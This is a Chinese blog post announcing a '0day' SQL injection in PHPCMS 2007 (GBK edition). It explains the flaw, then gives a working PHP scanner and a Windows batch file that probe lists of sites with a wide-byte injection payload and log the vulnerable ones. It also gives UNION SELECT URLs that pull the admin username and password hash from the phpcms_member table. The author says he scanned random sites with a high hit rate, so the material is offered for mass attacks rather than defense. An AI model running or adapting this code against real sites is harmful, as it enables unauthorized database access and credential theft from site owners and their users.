phpcms 2007 GBK版0day注射扫描脚本

2009年8月22日星期六 | | |

本来比较忙,想整个站,发现这个0DAY还是很好的,写了个脚本自动扫描存在了漏洞的站点,至于说自动注射出帐号密码,还是不要了,不装X了。

网上看了下,貌似是零客网安0.S.T的"小蟑螂"大哥发现的~~

漏洞产生在member/member.php的第4行,代码如下:

..............
$m = $db->get_one("SELECT * FROM ".TABLE_MEMBER." m , ".TABLE_MEMBER_INFO." i WHERE m.userid=i.userid AND m.username='$username' ","CACHE",86400);
..............

username变量未经过过滤就进入查询了,我们在其包含的include/common.inc.php文件中有如下代码:

................
@extract($_POST, EXTR_OVERWRITE);
@extract($_GET, EXTR_OVERWRITE);
...............

呵呵,开始注射吧!由于变量有单引号"'",所以我们要用一种方法去绕过这个限制,具体各位可以参考80sec的文章:
http://www.80sec.com/php-coder-class-security-alert.html

修改了下鬼仔的那个东西,直接那来用了,装X,哈哈……

=================scanbug.php==========================================

<?
if ($argc<3) {
print_r('
--------------------------------------------------------------------------------
PHPcms SODB-2008-13 Exp
Usage: php '.$argv[0].' host path
host: target server (ip/hostname),without"http://"
path: path to phpcms
Example:
php '.$argv[0].' localhost /
--------------------------------------------------------------------------------
');
die;
}

function sendpacketii($packet)
{
global $host, $html;
$ock=fsockopen(gethostbyname($host),'80');
if (!$ock) {
echo 'No response from '.$host; die;
}
fputs($ock,$packet);
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$prefix="phpcms_";
//$cookie="PHPSESSID=2456c055c52722efa1268504d07945f2";
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/'))
{echo "Error... check the path!\r\n\r\n"; die;}
/*get   $prefix*/
$packet ="GET ".$path."member/member.php?username=tlm%cf' HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
//$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
//echo $html;
echo "\n\n正在测试站点: $host ……\n";
if (eregi("in your SQL syntax",$html))
{
$temp=explode("FROM ",$html);
if(isset($temp[1])){$temp2=explode(" ",$temp[1]);}
if ($temp2[0]){
$prefix=$temp2[0];
echo "数据库为: ".$prefix."\r\n";
echo "当前站点发现漏洞,请手工检测...\r\n";
}
$filename = "php0day.txt";
$handle   = fopen ($filename,"a+");
if (!is_writable ($filename)){
die ("文件:".$filename."不可写,请检查其属性后重试!");
}
if (!fwrite ($handle,"\n存在漏洞的站点\t$host")){
die ("生成文件".$filename."失败!");
}
fwrite($handle,"\r\n");
fwrite($handle,"当前站点数据库\t");
fwrite($handle,$prefix);

fwrite($handle,"\r\n");
print_r('内容已经写入文件!');
fclose ($handle); //关闭指针
}
else
exit("没漏洞哦……\n");

?>

===================================END==========================================

脚本文件就更简单了:

===================================scan.bat=======================================

@echo off
title PHPcms PHPcms 0DAY自动注射程序工作中……
FOR /F "eol=; tokens=1,2,3* delims=, " %%i in (php.txt) do D:\PHPnow-1.4.5-20\php-5.2.6-

Win32\php.exe 0dayhpcms.php %%i /
pause

====================================end==========================================

貌似存在这个漏洞的站点很多啊,随便扫了一下,命中率相当高,呵呵~

至于查询密码,就用NUNION吧,网上找了个工具抓了下包,貌似是不同版本的字段数不一样

==============================================

/member/member.php?username=luoye%cf'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,username,password,57,58,59,60,61,62,63,64,65/**/from/**/phpcms_member/**/where/**/userid=1

/member/member.php?username=luoye%cf'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,username,password,57,58,59,60,61,62/**/from/**/phpcms_member/**/where/**/userid=1/*

/member/member.php?username=luoye%cf'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,username,password,52,53,54,55,56,57/**/from/**/phpcms_member/**/where/**/userid=1/*

/member/member.php?username=luoye%cf'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,username,password,53,54,55,56,57,58/**/from/**/phpcms_member/**/where/**/userid=1/*

==============================================

替换其中的数据库名就可以了,数据库名已经扫描出来了,有利用工具,自己发挥吧……



我的QQ空间
笔记本 microsoft ACPI-Compliant System 无法驱动 解决方案
今天安装HP540 笔记本XP系统,系统做好后安装驱动发现"micr...
 

0 评论:


所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]